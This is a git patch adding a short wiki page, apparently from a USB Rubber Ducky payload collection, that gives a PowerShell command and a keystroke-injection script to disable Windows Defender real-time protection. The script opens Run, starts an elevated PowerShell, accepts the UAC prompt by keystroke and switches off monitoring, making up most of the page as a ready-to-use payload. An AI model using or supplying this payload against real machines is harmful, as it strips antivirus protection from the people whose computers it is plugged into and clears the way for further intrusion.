From b203d65a2d4eab7050b3ec56b23b94f26ccd0c3b Mon Sep 17 00:00:00 2001
From: Hunter <hunterray55@hotmail.com>
Date: Thu, 30 Mar 2017 14:05:21 -0400
Subject: [PATCH] Created Payload - Windows 10 : Disable Windows Defender
 through powershell (markdown)

---
 ...ble-Windows-Defender-through-powershell.md | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 Payload---Windows-10-:-Disable-Windows-Defender-through-powershell.md

diff --git a/Payload---Windows-10-:-Disable-Windows-Defender-through-powershell.md b/Payload---Windows-10-:-Disable-Windows-Defender-through-powershell.md
new file mode 100644
index 0000000..7a46f6b
--- /dev/null
+++ b/Payload---Windows-10-:-Disable-Windows-Defender-through-powershell.md
@@ -0,0 +1,28 @@
+Windows defender can be disabled with PS using the following command
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+An example script: 
+
+```
+REM Windows 10: Disable Windows Defender with Powershell
+REM Author: Judge2020
+REM author website: Judge2020.com
+REM  
+REM let the HID enumerate
+DELAY 1000
+GUI r
+DELAY 200
+REM my best attempt at a elevated powershell instance
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 1000
+ALT y
+DELAY 200
+STRING Set-MpPreference -DisableRealtimeMonitoring $true
+ENTER
+STRING exit
+ENTER
+```
\ No newline at end of file